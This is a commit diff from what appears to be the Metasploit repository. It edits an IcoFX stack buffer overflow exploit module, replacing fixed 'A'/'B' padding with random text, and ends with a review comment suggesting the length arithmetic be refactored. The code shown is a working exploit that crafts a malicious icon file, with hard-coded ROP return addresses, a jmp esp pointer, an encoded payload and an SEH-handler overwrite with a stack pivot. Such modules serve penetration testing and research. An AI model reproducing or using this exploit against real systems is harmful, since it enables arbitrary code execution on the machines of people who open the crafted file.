Land #2817, icofx_bof random things

bug/bundler_fix
William Vu 2014-01-01 22:01:48 -06:00
commit d291cd92d7
GPG Key ID: E761DCB4C1629024
1 changed files with 5 additions and 5 deletions


@ -72,13 +72,13 @@ class Metasploit3 < Msf::Exploit::Remote
# ICONDIRENTRY structures 102 structures are using to overwrite # ICONDIRENTRY structures 102 structures are using to overwrite
# every structure = 16 bytes # every structure = 16 bytes
# 100 structures are used to reach the local variables # 100 structures are used to reach the local variables
ico << "A" * 652 ico << rand_text(652)
ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods
ico << [0x0045cc21].pack("V") # jmp esp ico << [0x0045cc21].pack("V") # jmp esp
ico << payload.encoded ico << payload.encoded
ico << "B" * ( ico << rand_text(
1600 - # 1600 = 16 ICONDIRENTRY struct size * 100 1600 - # 1600 = 16 ICONDIRENTRY struct size * 100
652 - # padding 652 - # padding to align the stack pivot
80 - # rop nops size 80 - # rop nops size
4 - # jmp esp pointer size 4 - # jmp esp pointer size
payload.encoded.length payload.encoded.length
@ -86,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
# The next ICONDIRENTRY allows to overwrite the interesting local variables # The next ICONDIRENTRY allows to overwrite the interesting local variables
# on the stack # on the stack
ico << [2].pack("V") # Counter (remaining bytes) saved on the stack ico << [2].pack("V") # Counter (remaining bytes) saved on the stack
ico << "A" * 8 # Padding ico << rand_text(8) # Padding
ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler
# The next ICONDIRENTRY allows to overwrite the seh handler # The next ICONDIRENTRY allows to overwrite the seh handler
ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret
ico << "B" * (0xc) # padding ico << rand_text(0xc) # padding
return ico return ico
end end
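Review bot: The length arithmetic in the new `rand_text(` call duplicates the constants it depends on — 652 is written once on the first padding line and again on the `652 - # padding to align the stack pivot` line, and `80 - # rop nops size` silently re-encodes `4 * 20` from the `* 20` ret line — so a later edit to one copy would desynchronize the total and the trailing filler would no longer bring the block to the 1600 bytes the comment promises. Binding each piece once keeps the bookkeeping self-consistent: `rop_nops = [0x0044729d].pack("V") * 20 # ret`, then `ico << rop_nops`, and `rop_nops.length - # rop nops size` in place of the literal 80; the 652 padding can get the same treatment. The same pattern also affects the second hunk only indirectly, since its `rand_text(8)` and `rand_text(0xc)` sizes are not referenced elsewhere. The enclosing method begins above the first hunk, so only its tail is visible here.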